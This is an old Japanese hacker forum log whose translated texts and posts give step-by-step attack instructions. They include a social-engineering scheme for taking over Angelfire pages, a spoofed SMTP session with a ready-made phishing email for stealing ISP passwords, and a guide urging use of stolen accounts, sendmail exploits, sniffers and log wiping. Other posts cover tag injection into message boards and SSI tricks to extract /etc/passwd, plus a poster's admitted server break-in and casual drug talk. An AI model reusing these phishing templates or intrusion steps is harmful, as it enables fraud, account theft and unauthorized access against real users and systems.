ak2/r00t7/index.html"> http://www.angelfire.com/mi/KrazieBread/
index.html </a> has been saved.<br>
You may have to click Reload or Super-Reload (Shift+Reload) to
see your edited page and not your old version when you go to
your URL.<br> You can also announce your new page on <a href="
http://homepages.whowhere.com/bin/showpage.pl?add">WhoWhere?</a>,
<a href="http://newtoo.manifest.com/"><u> What's New Too!</u>
</a>, or if you really want to get noticed, go to <a href="
http://www.submit-it.com/"><u>Submit It!</u></a><br> Tune up
your Web Site at the <a href="http://www.angelfire.com/cgi-bin/
ct?ad=websitegarage&vp=/index.clicked&ru=http://www.websitegar
age.com/whowhere">Web Site Garage</a>.</font>
</td></tr></table></center>
<form select method="post" action="http://www.angelfire.com/cgi-bin/bedit">
<input type="hidden" name="storage"  value="mi">
<input type="hidden" name="hpd"      value="r00t">     
<input type="hidden" name="password" value="r00t7">  <------- PASSWORDだ！

ユーザ名はURLの中に含まれているので、見つけるのは簡単だ。
http://www.angelfire.com/whatever/USERNAME/

Moving in for the Kill

1.)
hackしたい者を探し、彼に「perlスクリプトを通じてkeyloggerとpacket
snifferをインストールさせてしまうIE 4.0とNetscape Communicatorの
バグを見つけた」
と告げる。

2.)
彼に、bedit.html に記載されている情報が無いとスクリプトが動かない
ので bedit.html が必要だと告げる。

3.)
彼があなたにそのファイルを送ったら、必要としているものをもらおう。
Loginして、bedit.html からchange e-mailをクリックして、Hotmailか何か
に変更しよう(あなたの本当のe-mailは使わない)。

4.)
そのページをどうするかはあなた次第だが、よく考え後悔しそうなことは
避けよう…この行は書くのも馬鹿らしいが。

Conclusion

楽しんでもらえただろうか。
Angelfireの弱点を発見したeZoOns氏に、そしてIllumiTIE、r00t sE7EN、
Big Cheese、JellyNuts、Optiklenz、Godshippy各氏に感謝する。

> それ、お前がほんとに訳したのか？
> 同じく原文を翻訳したもの持ってんだけど、それを見て、日本語変えただけだろ。

はい、私が訳しました。原文と照らし合わせれば分かると思いますが、
原文に忠実な逐語訳になっています(that text should gag every
 newcomer's mouth.の部分とか見れば分かりますね)。大体、いちいち
他人の訳したものを改変しても得しませんから。

でもそっちの意訳の方が読みやすいですね。もらっときます(笑)。
Thanx

参考：05月20日(木)02時35分19秒

それ、お前がほんとに訳したのか？
同じく原文を翻訳したもの持ってんだけど、それを見て、日本語変えただけだろ。

夜の部にだいぶ前にリンク張られてた奴なんだけど、とりあえずアップしときました。
比較してみて下さい。
http://vip-room.virtualave.net/HowToBecome.txt

http://vip-room.virtualave.net/HowToBecome.txt

> お、いいすね。

少し流し読みしましたが、相当の力作ですね。「逮捕」なんて
項目まで有ります。
(1)即座に弁護士を呼べ
(2)警官とは話すな
なんて、ドキドキしてしまいます(笑)。

だいぶ前に訳した物ですが、古典的なSocial Engineeringを一つ。

How to Get Your friend\enemy's ISP password ?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
さて、
君は貯金を始めたくないか？
そして…君はISPに金を払いたくない、違うか？
よし！これを読んでくれ：

    Disclaimer:
     このテキスト及びテキストの内容は教育目的のみに書かれている。
     このテキストを元になされた行為は読者が責任を負うものとする。
     このテキストの筆者はこの情報を元になされた行為に対して責任を
     一切負わない。

    - FoX
            <訳者注>私も負いません。</訳者注>

これでよし、と。さあ始めよう！

   1.) telnetプログラムを走らせる:
       windowsなら START --> RUN --> "TELNET" だ。
       linuxなら shellを開いて telnet だ。

   2.) 次に、どこかのanonymousサーバに接続しよう。
       windowsなら"connect"、linuxなら"open"だ。
       もしサーバを知らないなら一つでいいから見付けて見よう。
       もし君がひどくlameなら俺にメールしてくれ！数分で教えて
       やるから。
     注意：君はサーバのport 25に接続しなければいけない！

   3.) 次に、以下のように書く:
       
        mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
        rcpt to:[**YOUR FRIEND'S EMAIL ADRESS**]
        data
        こんにちは [YOUR FRIEND'S NAME]様、こちらは[NAME OF YOUR
        FRIEND'S ISP]サポートチームです。
        さて、最近当社のサーバに接続に関するて問題が発生し、
        ユーザ名/パスワードのファイルが壊れてしまいました。
        バックアップによって現在復旧しましたが、昨日、そのバック
        アップが旧バージョンであることが判明し、このままでは
        あなたに莫大な使用料が課されてしまいます。
        - - - - - - - - - - - - - -
        問題解決の為、エラーを修正するプログラムを作成しました。
        あなたがすることは下記メールアドレスにメールを送るだけです。
         "[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com"
         SUBJECTにはユーザ名とパスワードを書いてください。

        注意：もしこの指導に従わなかった場合、課金は取り消せません！

                   よろしくお願いします。
                                           サポートチーム

   4.) Enterを二回押して "." を入力して(""は要らない)Enterだ！

--
**が何を意味しているか分かりにくいかも知れないので、
簡単な例を挙げよう。;)

[**YOUR FRIEND'S ISP WEBMASTER**] - 例えば、もしあなたの友人が
AOLの会員ならば "webmaster@aol.com"

[**YOUR FRIEND'S EMAIL ADRESS**] - 例えば、もしあなたの友人の
メールアドレスが john@aol.com ならば "john@aol.com"

[YOUR FRIEND'S NAME] - もしあなたの友人がJohnと呼ばれているならば
"John"

[NAME OF YOUR FRIEND'S ISP] - もしあなたの友人がAOL(American
Online)の会員ならば "American - Online"

"[**YOUR'S FRIEND'S ISP NAME**]@GalaxyCorp.Com" - ここは難しい所だが
あなたはこのテキストを読んでいるので心配は要らない。;)


*   WWWブラウザを起動して(IEでもNETSCAPEでもいい)
    "HTTP://www.galaxycorp.com"とタイプ。

*   アカウントを取る為にサインアップ。ユーザ名を何にするか尋ねられたら
    ISPの名前に最も近いものを試してみる。例えば、もし君の友人が American
    Online[AOL] のユーザなら、aol や a_o_l や american_online を試してみよう！

*   メールアドレスを尋ねられたら、ここは本当のアドレスを入力しよう！
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
普通の生活を続けて、そして思い立った時にメールをチェックしてみよう！
もし君が突然、友人からのメールをもらって、subjectが "john j4o87HnzG" だったなら
君は毎月10ドル節約できたことになる！
 - = - = - = - = - = - = - = - = - = - = - = - = - = - = -

    F-o-X
     Contact information:
       Email - FoXeS@ThePentagoN.CoM
       WWW   - WWW.FoReSt.CC (under construction)

 - = - = - = - = - = - = - = - = - = - = - = - = - = - = -

参考：05月19日(水)17時37分00秒

> どうぞどうぞ。あんなつたない訳で良ければ。原文は
> http://members.tripod.com/~kemuri2/hack2.txt
> で拾いました。
> 
> ついでに、文中に出て来る "How to cover your tracks"。
> これも訳しますか？
> 

お、いいすね。
っていうか翻訳系なら何でもＯＫす。
私は英語アレルギーなので(笑)

参考：05月19日(水)14時46分16秒

どうぞどうぞ。あんなつたない訳で良ければ。原文は
http://members.tripod.com/~kemuri2/hack2.txt
で拾いました。

ついでに、文中に出て来る "How to cover your tracks"。
これも訳しますか？

http://thc.pimmel.com/files/thc/htcyt.html

これなかなかためになると思いますよ。
H&Cのとこに張りつけておいてもいいですか？

私もOWNED SITE(綴りあってる？(笑))ネタだしたいんだけど
恐いところだからなぁ。。。
みんながみんなJPNICみたいに寛大だとは限らないのが恐いところ。笑い

参考：05月19日(水)01時25分52秒

> よーく見たら、ペンギンの写真とこに何か書いてある（笑）
> いゃーん（笑）

綴り間違ってる様子(笑)（White_eさん、指摘ありがとうです。
ぴえすでファイル残ってたらすぐ直せるんだけど。


> ていうか、このエンペラーペンギン、恐いっすね...
> ハラが、なんか爆発しそうで...

これ、ふつーのペンギンをフォトショッピングしただけです(笑)
ALTに小ネタも仕込んであったり・・

> とりあえず、「画像を名前をつけて保存」しておこう（笑）

見ましたよ(笑) 
指名手配されちゃったヽ(;;´ー｀)ﾉ
これで私はお尋ね者ですね。笑い 

参考：05月18日(火)23時03分35秒

はじめまして、Naviyといいます。
以前からここは見ていましたが書き込むのは初めてです。
TOPが変わるのが楽しみで楽しみで（笑）
侵入、ってTOPはかっこよかったですね。
今回のTOPもすごくカッコイイです。
私はまだ無知ですが、これからがんばって勉強しようと思います。
これからよろしくお願いします。

> いきなりIRCに乱入してきたドイツ人だったかな

おはようです。
つーか、Van HauserはドイツのＴＨＣっていうグループのリーダーですよ(笑)
すごい人です。

参考：05月19日(水)05時41分43秒

いきなりIRCに乱入してきたドイツ人だったかな

|----------------------- BECOME A HACKER ---------------------------|

君は既にいくつかのシステムのrootをhackした、しかし君はまだ
hackerではない。何故か？hackerとは、単にサイトをhackしたり
snifferを仕掛けたりする者ではない。real hackerはシステムを
理解したくて、システムがどう反応するか知り、システムを掌握
することで楽しみ、バグを発見し新たなツールを発明することを
面白く思う者だ。
それは言わばサイバースペースのコロンブスと言われるべき者だ。

14. 他のhackerと連絡を取り合い、情報や経験やアカウントや
exploitsやファイルを交換しよう。

15. NewsgroupやMLやIRCの議論を読め。
重要なRFCやCを学び、自身のツールをプログラムしろ。

16. "31337"になるな。
君はcoolであると自覚していてもそれを他人に知らしめる必要は
無い。普通に振る舞い、「どうやってUNIXをhackするんですか？」
と尋ねる者を助けよう。

訳者注：31337 = ElEET、エリート。

17. 疲れてはいけない。
現場にとどまり、newsgroupやMLや友人を見続け、hackingを
やめるな。17へ。

私からはこれだけだ。
このテキストは全ての初心者に吐き気を催させるだろう。
簡潔で汚いものだが、本当に必要なことを書いたつもりだ。

チャオ……

================================
はい。長い割にあまりタメにならない内容でしたね(笑)。
ではさようなら。

    |------------------------- BEGIN HACKING -------------------------|

 9. 他人のアカウントを手に入れろ。
君が知り合ったhackerに頼もう。君自身のアカウントでは
決してhackしてはならない！

10. このアカウントで最初のシステムをhackしろ。
exploit等を試そう。しかし最初の不正アカウントが履歴を
残さないように"How to cover your tracks"という記事は
覚えておくように。

11. より多くのホストを手に入れる為、ypxやsendmail exploits
や危険なNFS exports等を使え。
もし巨大なホストリストを持っていて自動的にテストする
スクリプトを使ったなら、この「古い」やり方も成果を上げる
だろう。しかしどこでホスト名を探すのか？多くの方法が有る。
IRCや /etc/hosts やWWWやWWWアクセスの統計等を試せ。
多くのホストが手に入るだろう。

12. rootが取れたなら、出来ればsnifferを仕掛けろ。
そうすることで多くの新しいホストのアカウントが手に入るだろう。

13. 君が作ったexploitを試してみよう。
最終的にはそれらが動かねばならない。12へ。

|------------------------ LEARN THE BASICS -------------------------|

 6. UNIXとInternetセキュリティに関する良い本を手に入れろ。
私が見つけた最高のものはGarfinkel Spafford共著の"Practical
Unix Security"第二版だ。UNIXが持つ基本的なセキュリティ
問題や穴や人々が犯すミスを学べ。

 7. Internetで見付かる全ての情報とファイルを集めろ。
wwwやftpを試し、検索エンジンを使え。セキュリティ関連のMLに
登録し重要そうなnewsgroupも読むように。IRCで良いサイトを
尋ねよう。

    Here is something to start:
	http://underground.org
	ftp://onyx.infonexus.com
	nntp://comp.security.*

    And of course the links on the Security & Hackerscene page ;-) 

	bugtraq mailing list ->
	email : listserv@netspace.org
	message body : subscribe bugtraq you-real-name 

 8. ファイルやデータを読んで分析せよ(ただ集めるだけでなく)。

"suid","sniffer","buffer overflow","firewall","rdist",
"nis","nfs", "satan" これらの言葉の意味と重要性が本当に
分かったならば先に進もう。

|-------------------------- HOW TO START ----------------------------|

 1. それに慣れろ。
馬の扱いを知らずしてロデオは出来ないだろう。

 2. UNIX領域を作れ。
Linux, FreeBSD, Solaris, Sinix 等を自分のコンピュータに
入れろ。LinuxとFreeBSDは安価でFreeBSDはBSDの系列であり、
Sys V系列のSolarisとSinixは高価だ。
助言：良いハンドブックがあるLinuxをお勧めする。

自分自身のUNIXの操作を学ばねばならない。最初にディレクトリ
変更、コピー、削除、エディタの使い方などの基礎を学べ。

 3. UNIXを使う動機付けをしろ。
どのようにするか、それは君次第だ。君のUNIXのデータベースを
使うのかも知れないしCでプログラミングするかも知れないし、
いずれにせよUNIXの使い方を学ばねばならない。

 4. 参考書を買え。
たくさん出版されているので良い店に入る。大学の近くのが良い、
そこの店員はどの本が良くてどの本が悪いのかを知っている。
私はO'Reilly Nutshell handbooks がいいと思うがAddison
Wesleyのは殆ど全て嫌いだ……個人的な意見だが。

 5. Internetアカウントを手に入れろ。
PPPと、出来ればshellが欲しい。hackingや、PGPを用いない
情報交換は決してしてはならない！君のコンピュータのUNIXを
ISPに接続出来るよう設定してみろ。数は少ないが良いハンド
ブックには具体的な記述が有る。

これら五段階を済ませてUNIXの操作を覚えたら(それは2〜8週間
かけるべきだ)次の段階に進もう。

お返事はメールでたった今出しました。ってこれだけで帰るのも
なんですね。折角天下のDEF CON ZEROに来たんだし…(ゴソゴソ)、
よし、こんなテキストを貼り逃げしてみよう。

============ hack2.txt ============
Author: van Hauser / THC

君はUNIX hackerになることを決心したがどうやって始めるか
分からないかも知れない。君が本当に始める前に、次のことは
絶対にはっきりさせておけ。

 1. Hackingは多大な作業である。
刹那的快楽の為の子供の遊びではない。君はシステムの操作や
プログラムの方法を学ぶ必要が有る。君はそれらがどう反応するか
研究し、ソースコードを読まねばならない。長く厳しい道のりで
あると忠告しておく。

 2. Hackingは違法行為である。
少なくとも大部分の国では(オランダとアルゼンチンだけは確か
hackingを取り締まる法律が無かったはずだが、だが必ず作られる)。
他人のアカウントでシステムに入ることさえも犯罪であり罰せられる。
有罪が言い渡されたら、君に前科が記録される。コンピュータ
犯罪者を従業員にする会社は殆ど無いので君の一生は台無しに
なるだろう。

 3. Hackingは時間がかかる。
半年だけhackingをして3箇月休んで、また舞い戻るというのは
不可能だ。Internetでは時が流れるのは早い。
新たなUNIXのリリース、新たなバグ、新たなバグフィクス……。
一度exploitにおいて遅れを取ったら、君は仲間に新しいものを
くれるよう頼まねばならない。そしてそんなことが続けば疎まれる
だろう。hackingの半分以上の時間は情報収集に使われる。
他のhackerと話し、MLやnewsgroupを読み、良いWWWやftpサイトを
巡れ。

しかし、本当にUNIXをhackingする動機は何だろう。それは君
次第だ。君がhackerになりたいのならば、何故なりたいのか
考えてみよう。"The Net"や"Hackers"のような映画は忘れるように。
あれは現実ではない！英雄になったり、ペンタゴンをhacking
したり、セクシーで女にもててセキュリティ会社でいい給料を
貰える男になる夢は捨てろ。これは起こり得ない。
だから、なぜそれをしたくて、なにを期待しているのか
明確にしろ。警察が逮捕に来て母親が泣くのを想像出来るか？

これらの警告を常に心に留めておけ。これは、君がやっている
こと、そしてやろうとしていることを明確にする為だ。

このガイドを書いたのは、しばしば上級のphreakerやblueboxers
ですら「どうやってUNIXをhackするのか？」と尋ねてくるからだ。
何度も何度も尋ねられて疲れてしまったので、これを書いた。
不備や誤りを責めないでくれ。私は気にしない。
最もタフな生き残りの為に…だから、君が本当に初心者ならば
このテキストから出来るだけ多くのことを学んで欲しい。

よーく見たら、ペンギンの写真とこに何か書いてある（笑）
いゃーん（笑）
ていうか、このエンペラーペンギン、恐いっすね...
ハラが、なんか爆発しそうで...
とりあえず、「画像を名前をつけて保存」しておこう（笑）

メールくれたWhite_eさん、指摘どうもありがとう御座いました。
これでなおっているでしょうか？

といいつつindexを別のに変えてみました(笑)

> この前HCDスキャンしてたら、コールバックがんがんかかってきて
> 怖いねぇ（笑）

ある意味もろ逆探知やん・・・
やってるあなたもおそろしいです(笑)

参考：05月18日(火)00時16分04秒

>RZ
この前HCDスキャンしてたら、コールバックがんがんかかってきて
怖いねぇ（笑）

> 
> はずかしいからリンクやめようよ（笑）

イヤ(笑)
数少ない電話系なんだから
残しましょう。笑い

ってかまだ使えるよねぇ？

参考：05月15日(土)23時55分04秒

> HTTP_USER_AGENTにxmpだのを仕込む・・・・
> かなり前に某団体"Ｇ"のＡ氏がＨＰに書いてから一気に広まったやつね☆
> 
> ま、やられた方はたまったものじゃないので、ほどほどに☆
> （それより、荒らしネタっていいんですの？＞ＲＺ氏）

書き方にもよるでしょうけど、
テクニック自体ならＯＫですよ。

参考：05月15日(土)19時32分38秒

すみません。ペーストでミスってました。

$ nslookup 
Default Server:  localhost
Address:  127.0.0.1

> set q=mx
> geocities.co.jp
Server:  localhost
Address:  127.0.0.1

geocities.co.jp preference = 10, mail exchanger = mail.geocities.co.jp
geocities.co.jp nameserver = dns.geocities.co.jp
geocities.co.jp nameserver = ns2.sphere.ad.jp
mail.geocities.co.jp    internet address = 210.153.89.137
dns.geocities.co.jp     internet address = 210.153.89.130
ns2.sphere.ad.jp        internet address = 202.239.113.26
> 

ですね。set q を忘れてはダメですね。

> 　メールアドレスとパスワードが分かっていて、受信サーバが分からない場合
> メールの受信はできるのでしょうか？
> 　大学のアドレスに来ているメールを自宅で今すぐに受け取りたいんですが、受信サーバと送信サーバが分からなくて、アカウントの設定ができません。どなたかよい知恵を
> お貸しください。お願いします。　

メールアドレスが判っているということは、@に続くドメインが判ってるはずだから
mail exchanger(メールサーバー)をDNSに聞けばよいだけでわ?
簡単に書くとnslookupする。

$ nslookup
Default Server:  localhost
Address:  127.0.0.1

> geocities.co.jp
Server:  localhost
Address:  127.0.0.1

geocities.co.jp preference = 10, mail exchanger = mail.geocities.co.jp
geocities.co.jp nameserver = dns.geocities.co.jp
geocities.co.jp nameserver = ns2.sphere.ad.jp
mail.geocities.co.jp    internet address = 210.153.89.137
dns.geocities.co.jp     internet address = 210.153.89.130
ns2.sphere.ad.jp        internet address = 202.239.113.26
> exit
$

これでいいんじゃないの?
あとは、そのサーバーが外からのPOPアクセス可能ならばメールを取ることが
出来るでしょう。

　メールアドレスとパスワードが分かっていて、受信サーバが分からない場合
メールの受信はできるのでしょうか？
　大学のアドレスに来ているメールを自宅で今すぐに受け取りたいんですが、受信サーバと送信サーバが分からなくて、アカウントの設定ができません。どなたかよい知恵を
お貸しください。お願いします。　

>http://www.ugtop.com/defcon0/hspeed/hs_index.htm

はずかしいからリンクやめようよ（笑）

HTTP_USER_AGENTにxmpだのを仕込む・・・・
かなり前に某団体"Ｇ"のＡ氏がＨＰに書いてから一気に広まったやつね☆

ま、やられた方はたまったものじゃないので、ほどほどに☆
（それより、荒らしネタっていいんですの？＞ＲＺ氏）

> 
> 芸が細かいな(笑)
> ログは今日みたけど、なかに事情通が何人かいた様子だな。
> というか、マジで一部はホンモノっぽいよ。笑い
> 
> 

一部つーかかなりほんものだったよ。
越**（本当の本物）が「越**(本物)」っつーHNの偽物に
「結構似てるな」なんて誉められてたよ。（笑）

参考：05月13日(木)21時18分16秒

ほんとだ、初めて知った。
結構楽しいかも（笑）
うぃ〜ん

多少有名だけど、名前が挙がらなかった人は
悔しがってるでしょうね。

> 
> 来てたじゃん。ほらほら。

芸が細かいな(笑)
ログは今日みたけど、なかに事情通が何人かいた様子だな。
というか、マジで一部はホンモノっぽいよ。笑い

参考：05月13日(木)17時22分31秒

> > 楽しそうだったらしい・・・見逃したヽ(´ー｀)ﾉ 
> >
> (無題)　投稿者：お＊＊＊＊コ 　投稿日：05月13日(木)00時56分56秒
> 
> ども　私からハクとったら何ものこりません

来てたじゃん。ほらほら。

ハクしちゃぃゃんょ。(;´Д`)

URLのけつに?<XMP><PLAINTEXT>入れてから
アクセス先に飛ぶと楽しいこと（つまらん）起こります。
(アクセス先にHTTP_REFERER表示している場合)
一番楽しいやり方はアクセスログをGIFで仕掛けてそれから
SSIぶっこむんで /etc/passwd ぬきだすという技ができていたところも
あったような。すかし足跡もろに残りますけど。とっとと消しちゃいましょう。（爆）

楽しそうだったらしい・・・見逃したヽ(´ー｀)ﾉ 

下の書きこみの「<」、「＜」です、半角の。

はじめまして。

投稿者のHTTP_USER_AGENTを表示したり埋め込んだりする掲示板では、
HTTP_USER_AGENTにタグを仕込むとタグ無制限になっちまいますね。
試した掲示板の数が少ないからわからないけど、あまり気づかれてないんですかね。

あと、これは俺の知り合いの書きこみが元で発見したんですが、
TCUPでURLのところに数字を入れて書きこむと、書きこむ時点で一番新しい
記事から数字分さかのぼった記事がトップになり、それ以降の記事が
表示されなくなります。
その後、普通の書き込みすると元に戻ります。
大きな数指定すると記事が表示されなくなっちゃうんで、
一番乗りとかいう書きこみがきそうで楽しいです。

あとTCUPでは「<font "」をメッセージ内に入れると、
それ以降の書きこみが右にずれます。
何度もやるとどんどんずれます。
楽しいです。

Mr.BOO's KRaD Telecom SIG <http://www.ugtop.com/defcon0/hspeed/hs_index.htm>
Japan UnderGround F.A.Q <http://www.ugtop.com/defcon0/faq/toc_test.htm>
気づかなかった

faq/toc_test.htm

　どうやら私の17インチモニタ−の設定（800/600）では、下の二つのリンク
が完全に隠れるので、どこにあるのかわからなかったようです
ということは、私と同じ設定の人はみんな見過ごしていたといういこと・・・？

> volmgtをstopしてtarで落としてftpで取ってきました。
> ソフトは「eggdrop」という物だったのですがどういうソフトか分かりません。
> だれかおしえてくれませんか？

おそらくirc用のボットです。
防御に優れているので外人とかよく使ってるみたい。
でも確かeggdrop用exploitとかあったような。笑い

参考：05月11日(火)15時50分04秒

はじめて書き込みさせて頂きます。
私はちょくちょくハッキングはしてるんですが、結構悪戯っぽい事をやってます。vfstab編集したり(笑)
こないだ入ったサーバー(Solaris2.6)で色々遊んでいたらFDが入っている事に気づき
volmgtをstopしてtarで落としてftpで取ってきました。
ソフトは「eggdrop」という物だったのですがどういうソフトか分かりません。
だれかおしえてくれませんか？

それにしても皆さんカッコいいメールアドレス持ってますね(笑)
BSのメアド、私も欲しいな。

> 　どうも、初めまして書き込みさせていただきます
> Indexの侵入ってのが、余りに場所が場所なだけにスゴ味がありますね（笑）
> ちょくちょくとＲＯＭさせてもらってるんですが、むか〜しにあったＦＡＱ
> は廃止になったんでしょうか？（すごく勉強になったのですが）

ありますよ。
フレームの下がメニューになっています。
top.htmってやつです。リンクもはっときます。
でわ

死ぬほど胃が痛い・・・・しくしく

http://www.ugtop.com/defcon0/top.htm

下の'石川五右衛門について'なのですが、
UNYUNさんの所と間違えてカキコしちゃいました。
どうもスイマセン！！
改めまして、mk-2と申します。
ご迷惑をおかけ致しました。m(__)m

侵入ど　どかーんと　あったのにはおどろいたよ。
まぁ侵入なんて最近後無沙汰だから心臓発作まで起きることはないが。

GETINFOクラスは初期化として他のクラスのインスタンスを生成してるだけで
すね
メインはこんな感じですね。

表示する文字の配列をつくっといて（Get your name. etc...）
カウンタを２個作って,ボタンは無効にしてと
thread生成して、こんなものでも走らすか

まず、無限ループ開始！

おっと、もっともらしくするためにしばらくおねんね

もし配列数よりカウンタ１が少なかったら
  {
    さらにカウンタ２が０ならば
      {
        テキストエリアに配列の”カウンタ１”番目を表示して
        カウンタ２インクリメント
       }
     いやいや、そうじゃなくてカウンタ２が３以内だったよ
      {
        テキストエリアに”.”を追加して
        カウンタ２インクリメント
       }
     それでも違えば 
       {
         エキスとエリアに”ok”表示してカウンタ２を初期化
         カウンタ１インクリメント
        }
    }
いや、はなっから違うね
  {
    ボタンが有効だったら次いってちょうだい

    そうじゃないなら
    テキストエリアに”ありがとう”と表示してボタン有効にしてね
   }
    次いって頂戴
}

やや（笑）抽象的ですが、オリジナルは尊重すべきということで..
逆コンパイルは良くないこととの認識を持ってますので（笑）

４月の頭に、ウチの後輩が「なんか、やられちゃったみたいなんっすけど〜」
とか言ってたのと同じヤツみたいです。結構普及(?)してるみたいですね。
たしか時期的にえーぷりるふーるだったと思いますんで、たぶんシャレだと...
ナマケモノな人なんで、そのまま放置してるんでしょう（笑）

＞mk-2さん
それは、ウチのことじゃないでしょうか...？

http://BASE.OC.TO/skyscraper/byte/551/

どうもそれっぽいですねぇ.
中身見てみた感じですと... 逆compileするまでもないかな...
# local diskへのaccessが行われるんで,しっかりしてるのかと思ったのですが
# 単純にJVMの起動？

>GETINFO.classダウンしてみたのですが・・1KBにしかみたず

インナークラスを含めて全てで三つのクラスファイルがあると思います。
因みに個人情報奪取に関してはハッタリであることは言うまでもありません。
for文で文字列を順番に表示してるだけです

　どうも、初めまして書き込みさせていただきます
Indexの侵入ってのが、余りに場所が場所なだけにスゴ味がありますね（笑）
ちょくちょくとＲＯＭさせてもらってるんですが、むか〜しにあったＦＡＱ
は廃止になったんでしょうか？（すごく勉強になったのですが）

　では、季節の変わり目ですどうぞ御自愛下さい

はじめまして、mk-2と申します。
過去ログで、'石川五右衛門'なるパスクラッカーが話題に上っていましたが、
配布は終了してしまったのでしょうか？？
よろしければ、頂きたいのですが・・・。
初カキコでお願いなんて大変申し訳ありませんが、
どうか、宜しくお願い致します！！

　大麻絡みだったらこんな所もあるよ

http://www2.plala.or.jp/amemiya/

　RZさん　皆さんこんにちは。

　先日は相談にのっていただいてありがとうございました。GETINFO.classを
ダウンしてみたのですが・・1KBにしかみたず　本当にダウンできているのか
疑問です。（笑）

　TOP笑わせて頂きました(^_^)　私も漢字は疎いのですが（爆）MS-IMEで
調べるに・・・ 侵(9)入(2)みたいです。　で紙に書いてみると・・・予想では・・・

侵 3-4 8-9 10-11
入 2-3　　　　　　　　が一画になると推測されます。

　どこかで字画での運勢を診断してもらえないかな（笑）以上揚げ足取りのようで
・・・　申し訳ありません。

> こないだからSparcとIntenのSolarisがメインマシンになったんですけど、
> 相変わらず遊んでばかりで、本業はちっともはかどらないです（笑）

私は全然遊べてないです。笑い


> ところで、アレ、高速広域スキャナなだけにテストが困りますね（笑）
> 回数できないので、かなり真剣にデバッグせんといかんのはツラいかも...
> あれからもし変更があったら、また送ってもらえませんか？

ぅぃす。
とりあえずクラスＣ用で実験でもしてみます。これなら安全なので(笑)
まぁデータは後からついてくるもんですからどうにかなるでしょう。
狂ったようにRSTとばしてくるやつとか面白かった。笑い

参考：05月08日(土)11時00分37秒

以前から、ロムっていましたが書き込むのは初めてっす
偽○○○○君とは、以前某米国人が来日したとき
携帯でお話しさせていただきました

ドラッグ系の話がちょこっと出てきたので
思わず書いてしまった次第です
今後のコンテンツ充実を期待しているっす

こないだスカンクの極上、仕事中にやったら
大変なことになったっすよ、あはははは

いやー、今回のINDEXは私もハマりました。
ちゅか、そのまんまですね（笑）

こないだからSparcとIntenのSolarisがメインマシンになったんですけど、
相変わらず遊んでばかりで、本業はちっともはかどらないです（笑）
ちょっと前のIRIXもヒドかったですけど、SolarisはBuggestUNIXですね。

ところで、アレ、高速広域スキャナなだけにテストが困りますね（笑）
回数できないので、かなり真剣にデバッグせんといかんのはツラいかも...
あれからもし変更があったら、また送ってもらえませんか？

それと、実はサイバー犬は最近Solaris２.ｘに対応したんですけど、こないだの
不幸な事故でアップ前に死亡してしまいました。でも、変更は意外とアッサリ
だったんで、また作ります。私も要るので(笑)。

サイバー犬についてですけど、
ソラリス2.x(多分2.4か2.5)用にはできないものでしょうか。

ってくれくれ君だなこれ・・・(笑)

参考：05月08日(土)05時01分17秒

> ＞KUSUさん
> そういうトコは、もともとそういう人がやってるんで、期待しても無駄かも
> しれないです。

あー、ウチとか？(笑)
未だにリンク集とかフレーム内表示だし・・・・


> ＞ＲＺさん
> ドラッグですかー。小心者の私にはとてもコワイ世界ですが、濃いーの楽しみに
> してます。
> とりあえず、今すぐ欲しいのは、バシっと冴えて、楽しい気分でスパスパっと
> 仕事が片付くヤツなんですけど(笑)、そんなのナイですよね...

一応、覚醒するヤツはあるみたいですよ。笑い
私は未体験ですが。っていうかやりません(笑) 　ほのぼのと楽しんでます。
ま、書いたとしてもマジでやってる人の文章には多分かなわないでしょぅねぇ・・

うにゅんさん、何やらすごいことやってますね
私はアセンブラ全然わからないので感心しきりですよ
英語ページ作らないとだめですね。笑い
Bugtraq進出たのしみにしてます。

あ、それといつぞやのコードですが、、
プロセス間通信で0xffffのマップが作れればおっけーなんですけど
全然やってないです(笑)　すみません
とりあえず概念だけはほうり込んだのですけど。
テストすると怒られるんですよね、いろんなトコから(笑)

参考：05月08日(土)05時01分17秒

> はじめて書き込みさせていただきます。
> トップページに涙が出るほど爆笑させてもらい、思わずこの感動(^_^;を伝えたくて
> 書き込みさせていただきました。
> 書き順をマウスでなぞってみたのは、私だけかな？（笑）
> 最近こまめにトップページを変更されているようなので、これからも毎日楽しみ
> にしてますね。

ども。
笑ってくれる人がいて良かったです(笑)
ところで「侵」の８−９と、「入」の２−３は実は１つかも知れない・・
ああ、漢字の書き順すらわかんねーなんて。笑い

本当はコンテンツをまめに増やしたいんですけどね。
どうも一気にものを書き上げるだけの気力がないっす。

参考：05月08日(土)04時35分44秒

＞KUSUさん
そういうトコは、もともとそういう人がやってるんで、期待しても無駄かも
しれないです。
私んとこの地元にそういうISPがあります。
落ちまくってましたが、一向にゴメンナサイを言わなかったです。
その頃は、勝手に使ってたんで文句は言えんのですけど（笑）

＞ＲＺさん
ドラッグですかー。小心者の私にはとてもコワイ世界ですが、濃いーの楽しみに
してます。
とりあえず、今すぐ欲しいのは、バシっと冴えて、楽しい気分でスパスパっと
仕事が片付くヤツなんですけど(笑)、そんなのナイですよね...

はじめて書き込みさせていただきます。
トップページに涙が出るほど爆笑させてもらい、思わずこの感動(^_^;を伝えたくて
書き込みさせていただきました。
書き順をマウスでなぞってみたのは、私だけかな？（笑）
最近こまめにトップページを変更されているようなので、これからも毎日楽しみ
にしてますね。

＞KUSUさんへ

　＞明日担当のものから連絡させるといって翌日になったらもうすでに直っている
　＞状態になっていました。（翌日まだ使えませんか？などといって連絡してきて
　＞自分たちの責任を認めようとはしない）やっぱりユーザーからの申告を利用
　＞して障害を直して何もなかったかのようにするようなプロバイダーというのは
　＞多いのでしょうか？

「DIO」というプロバイダは知らないのですが、プロバイダに限らず故障等の苦情を
連絡すると『なんともなってないですよぉ・・・』と言いつつ、その端から直るという事
はよくありますね。
「みかか」相手では、こんな事が日常茶飯事です（苦笑）

以下はKUSUさんのポストの再掲載です。


いつも勉強とおなじく拝見させていただいております。

  突然なんですが私の姉がとある　「ＤＩＯ？」というプロバイダーに加入し
ているのですが昨日５日にメールを見ようと思ったら（サーバーが見つかりま
せんと返されてしまいました。設定まちがいかと思って再確認した結果問題な
いためとりあえずプロバイダーのＨＰのなかの障害情報ってゆうようなＨＰを
見た結果記入がないためダウンしようとしたメールサーバーへＰＩＮＧをかけ
